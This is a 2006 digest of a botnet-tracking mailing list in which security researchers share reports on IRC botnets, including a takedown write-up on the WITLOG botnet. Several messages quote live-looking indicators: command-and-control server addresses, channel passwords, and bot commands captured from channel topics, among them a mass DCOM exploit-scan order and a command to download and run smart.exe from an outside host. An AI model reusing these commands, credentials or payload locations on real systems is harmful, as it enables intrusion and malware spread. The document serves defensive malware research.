To report a botnet PRIVATELY please email: [EMAIL PROTECTED] ----------
>From: [EMAIL PROTECTED] >Reply-To: [email protected] >To: [email protected] >Subject: botnets Digest, Vol 2, Issue 1 >Date: Sun, 02 Apr 2006 04:24:38 -0500 > >Send botnets mailing list submissions to > [email protected] > >To subscribe or unsubscribe via the World Wide Web, visit > http://www.whitestar.linuxbox.org/mailman/listinfo/botnets >or, via email, send a message with subject or body 'help' to > [EMAIL PROTECTED] > >You can reach the person managing the list at > [EMAIL PROTECTED] > >When replying, please edit your Subject line so it is more specific >than "Re: Contents of botnets digest..." > > >Today's Topics: > > 1. Re: new one (gmailVoldor) > 2. Re: botnet reporting (Nicholas Albright) > 3. Botnet/Spam question (Mar Matthias Darin) > 4. Tiny botnet (Nicholas Albright) > 5. a write-up on witlog (Kyle Lutze) > 6. botnet files location report (bart sikkes) > 7. Re: new one (Niklas Schiffler) > 8. Re: new one (PinkFreud) > > >---------------------------------------------------------------------- > >Message: 1 >Date: Sun, 26 Mar 2006 13:52:37 +0200 >From: gmailVoldor <[EMAIL PROTECTED]> >Subject: Re: [botnets] new one >To: Jeremy Linden <[EMAIL PROTECTED]> >Cc: [email protected] >Message-ID: <[EMAIL PROTECTED]> >Content-Type: text/plain; charset=ISO-8859-15; format=flowed > > > > I just had a conversation with the guy who runs this botnet. He's from > > Lebanon, part of the GurLteam (a common name if you do lots of botnet > > stuff), and he installs spyware on his machines, as a business. In my > > opinion, this won't be used for DDoS; these guys are professional > > criminals who just want to make their money. I hope they get busted > > though. > > > > Jeremy Linden > > >A professional criminal don't use common spyware for infect or irc for >control bots but the group makes they own scripts, I think 95% botnets >detected are owned by kiddies, bye > >alex >from italy > > >------------------------------ > >Message: 2 >Date: Sun, 26 Mar 2006 10:16:59 -0700 >From: Nicholas Albright <[EMAIL PROTECTED]> >Subject: Re: [botnets] botnet reporting >To: [email protected] >Message-ID: <[EMAIL PROTECTED]> >Content-Type: text/plain; charset="iso-8859-1" > > > > > > Naturally, everyone is welcome to start their own systems. If it means > > anything to anyone, I personally trust the people at Shadowserver. > > > > I am not aware of how they report the information, but I am sure they > > will come up with something. > > > > Gadi. > > >We thank Gadi for his support. Shadowserver supports Whitestar 100% and >will >continue to post to this list. > >Some times the networks we see can't be posted publicly, as I'm sure >everyone >understands. This mailing list is still the best way to discuss botnets and >their events publicly. Please continue to do so! > >The tracking system reported by Kyle is a one way mirror, you can post but >you >cant see other networks until they've been shut down or meet a certain >criteria. > >with regards, >Nichoals >-- >Nicholas Albright >Shadowserver.org Founder >http://www.shadowserver.org > > > >-------------- next part -------------- >A non-text attachment was scrubbed... >Name: not available >Type: application/pgp-signature >Size: 827 bytes >Desc: not available >Url : >http://www.whitestar.linuxbox.org/mailman/private/botnets/attachments/20060326/d8ce7314/attachment-0001.pgp > >------------------------------ > >Message: 3 >Date: Sun, 26 Mar 2006 17:47:53 -0600 >From: "Mar Matthias Darin" <[EMAIL PROTECTED]> >Subject: [botnets] Botnet/Spam question >To: "BotNet List" <[email protected]> >Message-ID: <[EMAIL PROTECTED]> >Content-Type: text/plain; charset="utf-8" > >Hello, > >Is there a spamtrap address where spam/viruses infected mail can be sent? >Note I I already direct my server's spam to the FTC and to Blitzed.org. > >Thank you in advance. > >-------------- next part -------------- >A non-text attachment was scrubbed... >Name: not available >Type: application/pgp-signature >Size: 189 bytes >Desc: not available >Url : >http://www.whitestar.linuxbox.org/mailman/private/botnets/attachments/20060326/e83412dc/attachment-0001.pgp > >------------------------------ > >Message: 4 >Date: Mon, 27 Mar 2006 14:22:51 -0700 >From: Nicholas Albright <[EMAIL PROTECTED]> >Subject: [botnets] Tiny botnet >To: [email protected] >Message-ID: <[EMAIL PROTECTED]> >Content-Type: text/plain; charset="iso-8859-1" > >This botnet is interesting to me because the owner knows something about >the >COX ISP's security system. COX has an ircd system in place to catch drones. >The service they use is called Marvin. > >The trojan came to us via a honeypot operating inthe NZ area: > >Report on cox-securitymarvin.exe - >******************************************** >MD5: f766e46e42bf32d58ea28062f262249e >AntiVir: Worm/RBot.328262 >Avast!: ? ? ? Win32:Trojano-3428 [Trj] >AVG: No Virus Found >BitDefender: Backdoor.RBot.0E463EAA >ClamAV: Exploit.DCOM.Gen >F-Prot: W32 Ircbot1.gen > >SERVER: 205.209.156.33 >PORT: 6667 >NICK: Cox-Security-|-123456 >USER CONNECT STRING: USER apbkay 0 0 :Cox-Security-|-123456 >Bot Population: 63 >Channel: ##cox## >Chan Key: rofl >Topic: .root.mass -s >Operator: opwirpwoeipweior > > >The bot was poorly spread, as it doesn't use any packing or obscuring >techniques, its quickly picked up by all the virus scanners and strings >output will display useful information. >-- >Nicholas Albright >Founder of Shadowserver.org >http://www.shadowserver.org > > > >-------------- next part -------------- >A non-text attachment was scrubbed... >Name: not available >Type: application/pgp-signature >Size: 827 bytes >Desc: not available >Url : >http://www.whitestar.linuxbox.org/mailman/private/botnets/attachments/20060327/ee326148/attachment-0001.pgp > >------------------------------ > >Message: 5 >Date: Mon, 27 Mar 2006 12:56:22 -0800 >From: Kyle Lutze <[EMAIL PROTECTED]> >Subject: [botnets] a write-up on witlog >To: [email protected] >Message-ID: <[EMAIL PROTECTED]> >Content-Type: text/plain; charset=UTF-8 > >-----BEGIN PGP SIGNED MESSAGE----- >Hash: SHA1 > >the following was written by a member of shadowserver at nal's request >and posted by me so he could stay anonymous. anywhere, here's some >information about witlog > >Kyle > >- --------------------------------------- >WITLOG - Botnet Report >"An Old Dog with New Tricks" > >Introduction: >The botnet affectionately known as "WITLOG" to those who monitored, >tracked and have thus far shut down core parts of its infrastructure >twice is something of an anomaly in today's botnets. It doesn't use a >sophisticated or new worm to propagate. In fact it uses old code which >is freely available on the Internet to download and play with. It also >didn't use any real form of encryption to hide or obfuscate its actions. >The operator of the botnet, was generally a friendly individual who >would talk and let you watch what he was up to. Overall I'd say that >this wasn't so much an education in sophisticated botnet techniques as >much as it was an education in just how poorly managed some large >hosting companies are and that due to this being a pervasive element of >the Internet at large that SRS is inherently broken. > >Background: >I first became aware of WITLOG not long after having installed Nepenthes >to do some malware research. The WITLOG botnet intrigued me because it >used a distribution system that, in a perfect world, should have been >incredibly easy to shut down. While the worm spread it relied on a >Round Robin DNS entry to download backdoors, and other code via HTTP. >The backdoor would then rely on another Round Robin DNS entry to connect >to a small IRC network that ranged between 3 and 5 servers. The actual >hosts that the names resolved to resided across the globe. > >Tracking & Reporting: >It was obvious to me from the beginning that the weakest point in the >WITLOG infrastructure was its reliance on DNS resolution. So while >reporting the actual hosts used for HTTP distribution and IRC server >hosting was part of the equation it was not the primary focus of my >efforts. > > >From the onset I concentrated on hosting companies and hacked servers >which were being used to serve backdoor (botnet) and adware code to >infected machines which were located in the United States -- And, after >quickly determining that witlog.com was used solely for a botnet getting >the registrar to remove the domain. > >The Infrastructure: > >[iPowerWeb - Primary malware hosting servers used by WITLOG during its >first iteration] > >A complete displeasure to work with. This hosting company boasts a huge >customer base, offers up pictures of the President of the company posing >for PR shots with Mayor of Phoenix, and "Support: 24 hours a day, 7 days >a week, 365 days a year". Let me spell this out for you... B U L L S H >I T. I have yet to come in contact with a more unresponsive and >downright abrasive hosting company in my life. Not only were they >completely unwilling to put me in contact with anyone in their NOC or >anyone with any technical experience - but they would close tickets as >"resolved" when they had made no contact with me whatever. > >I suppose it should come as no surprise, considering it was later >determined that the WITLOG operator had rooted some dozen or so of their >boxes. So to any iPowerWeb customers out there - best of luck. > >After over a month they did eventually manage to shut the WITLOG >operator out of their network according to WITLOG operator himself. > >[OZnic.de - Hacked SRS - First used for WITLOG.com] > >This company also proved to be completely unresponsive to requests for >information, suggestions regarding their situation, and requests for >contact to discuss the situation. I have to hypothesis at this point, >because I don't know what happened internally... But after reporting >the situation to the BSI and Global Village GmbH OZnic.de did manage to >kick the WITLOG operator off of their name servers. > >The WITLOG operator had obviously planned for this to happen at some >point as he already had another SRS lined up in Italy to take over >duties. He changed the domain from witlog.com to witlog.net and was >back in business at full force. > >[tuonome.it - Hacked SRS - First used for WITLOG.net] > >Also completely unresponsive, but then, what public company wants the >world to know that their registry key has probably been stolen. >Eventually, thanks in no small part I'm sure to the efforts of a local >.IT security expert I found on the Internet, we got the right officials >in place to apply pressure to tuonome.it. And that was that. > >For now WITLOG appears to be done. The IRC backend will eventually die >off given that WITLOG operator doesn't fire up new code using another >hacked SRS. He claims to have several SRSes which are rooted (a few of >which are in the United States) - but he claims he is saving them for >something else. > >[korea] >Not much to say here. I know some have had success in dealing with >getting hacked servers taken off the network in Korea. I had no such >luck. Completely unresponsive. > >The last known operating addresses for HTTP distribution were in Korea >and are: > >Non-authoritative answer: >Name: http.down.love.witlog.net >Address: 222.237.76.96 >Name: http.down.love.witlog.net >Address: 222.237.76.91 > >The IRC servers really don't need to be publicized as the owners of the >networks have been notified several times over, and it is still pretty >well populated with hacked machines. > >Best of luck to all the other hunters out there. And thanks to everyone >involved in applying the pressure needed to bring this one to a close. > >Anonymous. >-----BEGIN PGP SIGNATURE----- >Version: GnuPG v1.4.2.2-ecc0.1.6 (GNU/Linux) >Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org > >iD8DBQFEKFF2VFIipMnXxfYRAq1gAJ9i5Mw2EkMeXXe9TalJcObK+jukjwCfVzuL >8rPyVWbfr+HoOJw/FlcTgzE= >=jjpK >-----END PGP SIGNATURE----- > > >------------------------------ > >Message: 6 >Date: Tue, 28 Mar 2006 11:38:34 +0200 >From: "bart sikkes" <[EMAIL PROTECTED]> >Subject: [botnets] botnet files location report >To: [email protected] >Message-ID: > <[EMAIL PROTECTED]> >Content-Type: text/plain; charset=ISO-8859-1 > >i saw someone posting about this address on a forum saying he noticed >lots of connection to it in his firewall logs, to me it looks like >files used by a bot, the cmd2.txt file certainly indicates that. i >have no further information and am not experienced enough to do >research on it safely. > >http://x90.dyndns.org/ > >good luck with it, >bart > > >------------------------------ > >Message: 7 >Date: Thu, 30 Mar 2006 22:58:38 +0200 >From: Niklas Schiffler <[EMAIL PROTECTED]> >Subject: Re: [botnets] new one >To: [email protected] >Message-ID: <[EMAIL PROTECTED]> >Content-Type: text/plain; charset=ISO-8859-1; format=flowed > >Jeremy Linden wrote: >.. > > > > I just had a conversation with the guy who runs this botnet. He's from > > Lebanon, part of the GurLteam (a common name if you do lots of botnet > > stuff), and he installs spyware on his machines, as a business. In my > > opinion, this won't be used for DDoS; these guys are professional > > criminals who just want to make their money. I hope they get busted > > though. > > > > Jeremy Linden > >Here's another one by the GurLteam: > >Botnet (W32/Spybot.AKCH): > >[ Network services ] > * Looks for an Internet connection. > * Connects to "users.hot-screen.com" on port 6667 (TCP). > * Connects to IRC server. > * IRC: Uses password nadjoe. > * IRC: Uses nickname Tfeh-80340024. > * IRC: Uses username ezkieyacag. > * IRC: Joins channel ##Tfeh with password li. > * IRC: Sets the usermode for user Tfeh-80340024 to -x+B. > > >inetnum: 83.98.133.0 - 83.98.133.255 >netname: NL-NFORCE-ENTERTAINMENT >descr: NForce Entertainment >country: NL >admin-c: RVE16-RIPE >tech-c: RVE16-RIPE >status: ASSIGNED PA "status:" definitions >mnt-by: ROKSCOM-MNT >source: RIPE # Filtered > >* Looking up users.hot-screen.com >* Connecting to users.hot-screen.com (83.98.133.125) port 6667... >* Connected. Now logging in... >* GurLStuff, [EMAIL PROTECTED] >* MAP KNOCK SAFELIST HCN MAXCHANNELS=8 MAXBANS=60 NICKLEN=30 TOPICLEN=307 >KICKLEN=307 MAXTARGETS=15 AWAYLEN=307 :are supported by this server >* WALLCHOPS WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ >CHANMODES=be,kfL,l,psmntirRcOAQKVGCuzNSMT NETWORK=GurLStuff >CASEMAPPING=ascii EXTBAN=~,cqr :are supported by this server > > Now talking on ##Tfeh >* Topic for ##Tfeh is: ;raw join ##lscan,##lmon >* Topic for ##Tfeh set by GurL at Sun Mar 26 20:22:26 2006 > >--> Now talking on ##lscan >* Topic for ##lscan is: ;advscan dcom135 300 5 0 -r -s >* Topic for ##lscan set by GurL at Sun Mar 26 20:22:26 2006 > >--> Now talking on ##lmon >* Topic for ##lmon is: ;download http://www.darkblueroom.com/smart.exe >c:\smart.exe 1 -s >* Topic for ##lmon set by GurL at Sun Mar 26 20:22:25 2006 > >smart.exe extracts the following files to to c:\Windows\tok (scanned with >AntiVir) > >mc-110-12-0000336.exe (DR/Dldr.NSIS.Agent.P.1) >smart.exe (?) >yaz.exe (TR/LowZones.CR.2) >zan.exe (TR/LowZones.CR.3) >run.bat > >I don't know yet what the unpacked smart.exe does. > >nick.. > > > >------------------------------ > >Message: 8 >Date: Thu, 30 Mar 2006 20:03:42 -0500 >From: PinkFreud <[EMAIL PROTECTED]> >Subject: Re: [botnets] new one >To: Niklas Schiffler <[EMAIL PROTECTED]> >Cc: [email protected] >Message-ID: <[EMAIL PROTECTED]> >Content-Type: text/plain; charset=us-ascii > > > smart.exe extracts the following files to to c:\Windows\tok (scanned >with AntiVir) > >It should be noted that the smart.exe you grabbed from darkblueroom is >a RarSFX package. This can be unpacked with standard 'unrar', for >those of you not wishing to run it. > > > mc-110-12-0000336.exe (DR/Dldr.NSIS.Agent.P.1) > > smart.exe (?) > > yaz.exe (TR/LowZones.CR.2) > > zan.exe (TR/LowZones.CR.3) > > run.bat > > > > I don't know yet what the unpacked smart.exe does. > >This one contains the following interesting strings: >E.C.S. International1'0% >Secure Application Development1 >E.C.S. International0 >+#o; >www.ecsinternational.info0> >HClick here to agree this download... >(http://dollarrevenue.com/eula.asp?id=1950 > >I'd say it likely installs spyware on the compromised machine in order >to make the bot herder money. > > > > > nick.. > >-- >PinkFreud >Chief of Security, Nightstar IRC network >irc.nightstar.net | www.nightstar.net >Server Administrator - Blargh.CA.US.Nightstar.Net >Unsolicited advertisements sent to this address are NOT welcome. > > >------------------------------ > >_______________________________________________ >botnets mailing list >[email protected] >http://www.whitestar.linuxbox.org/mailman/listinfo/botnets > > >End of botnets Digest, Vol 2, Issue 1 >************************************* _______________________________________________ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
